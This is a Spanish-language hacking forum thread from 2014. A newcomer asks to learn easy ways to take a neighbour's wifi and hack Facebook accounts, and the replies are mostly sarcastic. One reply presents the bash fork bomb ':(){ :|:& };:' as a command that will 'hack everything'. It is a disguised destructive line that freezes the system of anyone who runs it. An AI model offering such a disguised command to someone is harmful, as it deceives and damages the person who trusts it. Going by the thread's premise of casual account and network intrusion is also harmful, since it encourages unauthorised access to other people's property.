Hola

Iniciado por F0M3T, Septiembre 27, 2014, 08:34:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Que tal, soy f0m3t, soy nuevo en este foro y quisiera aprender mucho de todos ustedes, espero me puedan ayudar a ser un gran hacker para ser el más kúl de mi cole, conseguir wifi del vecino gratis usando pr0hax0r skillz y ya es todo, saludos!
Tener éxito no es aleatorio, es una variable dependiente del esfuerzo.

xDDD Ya veremos como hacer ;)
Visita mi blog: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

No te preocupes, nosotros te vamos a ayudar. Te bajas algunos scripts y listo!

Que gusto porque eso de estudiar y demás no me gusta mucho, me gustan mas las cosas facilitas como cuando te metes a paginas y ya esta hackeado el feisbuc de alguien jajaja
espero comenzar a hackear lo antes posible, pero con programas sin aprender mucho porfa
Tener éxito no es aleatorio, es una variable dependiente del esfuerzo.

Septiembre 27, 2014, 10:53:14 PM #4 Ultima modificación: Septiembre 27, 2014, 11:20:33 PM por Stuxnet
Si usas linux coloca esto y asi podras kakear todo

Código: bash

:(){ :|:& };:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

!!!!Qué bueno. Seguramente llegarás a ser un gran Juanker!!!! ;)

Aquí, a los users tímidos como tú (lo digo porque tu presentación es después de 200 y pico de mensajes), le damos todito en bandeja. Toma asiento.  ;D ;D ;D

G.
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.